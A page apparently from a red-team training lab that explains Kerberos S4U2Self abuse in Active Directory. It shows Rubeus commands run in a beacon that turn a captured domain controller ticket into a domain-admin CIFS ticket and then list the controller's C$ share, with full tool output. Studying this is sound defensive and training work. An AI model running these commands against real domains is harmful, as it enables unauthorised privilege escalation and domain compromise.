S4U2Self Abuse | What is this changing

Last updated 5 days ago

As we saw in the previous two examples of constrained delegation, there are two S4U (Service for User) extensions. S4U2Self (Service for User to Self) and S4U2Proxy (Service for User to Proxy). S4U2Self allows a service to obtain a TGS to itself on behalf of a user, and S4U2Proxy allows the service to obtain a TGS on behalf of a user to a second service.

When we abused constrained delegation, we did: Rubeus s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /user:sql-2$. From the output, we saw Rubeus first builds an S4U2Self request and obtains a TGS for nlamb to sql-2/dev.cyberbotic.io. It then builds an S4U2Proxy request to obtain a TGS for nlamb to cifs/dc-2.dev.cyberbotic.io.

This is obviously working by design because SQL-2 is specifically trusted for delegation to that service. However, there's another particularly useful way, published by , to abuse the S4U2Self extension - and that is to gain access to a computer if we have its TGT.

In the Unconstrained Delegation module, we obtained a TGT for the domain controller. If you tried to pass that ticket into a logon session and use it to access the C$ share (like we would with a user TGT), it would fail.

This is because machines do not get remote local admin access to themselves. What we can do instead is abuse S4U2Self to obtain a usable TGS as a user we know is a local admin (e.g. a domain admin). Rubeus has a /self flag for this purpose.

Last updated 5 days ago

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /ticket:doIFuj[...]lDLklP /nowrap [*] Action: S4U [*] Building S4U2self request for: 'DC-2$@DEV.CYBERBOTIC.IO' [*] Using domain controller: dc-2.dev.cyberbotic.io (10.10.122.10) [*] Sending S4U2self request to 10.10.122.10:88 [+] S4U2self success! [*] Substituting alternative service name 'cifs/dc-2.dev.cyberbotic.io' [*] Got a TGS for 'nlamb' to 'cifs@DEV.CYBERBOTIC.IO' [*] base64(ticket.kirbi): doIFyD[...]MuaW8= beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFyD[...]MuaW8= [*] Using DEV\nlamb:FakePass [*] Showing process : False [*] Username : nlamb [*] Domain : DEV [*] Password : FakePass [+] Process : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9 [+] ProcessID : 2664 [+] Ticket successfully imported! [+] LUID : 0x4ff935 beacon> steal_token 2664 beacon> ls \\dc-2.dev.cyberbotic.io\c$ Size Type Last Modified Name ---- ---- ------------- ---- dir 08/15/2022 15:44:08 $Recycle.Bin dir 08/10/2022 04:55:17 $WinREAgent dir 08/10/2022 05:05:53 Boot dir 08/18/2021 23:34:55 Documents and Settings dir 08/19/2021 06:24:49 EFI dir 08/15/2022 16:09:55 inetpub dir 05/08/2021 08:20:24 PerfLogs dir 08/24/2022 10:51:51 Program Files dir 08/10/2022 04:06:16 Program Files (x86) dir 09/05/2022 17:17:48 ProgramData dir 08/15/2022 15:23:23 Recovery dir 08/16/2022 12:37:38 Shares dir 09/05/2022 12:03:43 System Volume Information dir 08/15/2022 15:24:39 Users dir 09/06/2022 15:21:25 Windows 427kb fil 08/10/2022 05:00:07 bootmgr 1b fil 05/08/2021 08:14:33 BOOTNXT 1kb fil 08/15/2022 16:16:13 dc-2.dev.cyberbotic.io_sub-ca.req 12kb fil 09/05/2022 07:25:58 DumpStack.log 12kb fil 09/06/2022 09:04:41 DumpStack.log.tmp 384mb fil 09/06/2022 09:04:41 pagefile.sys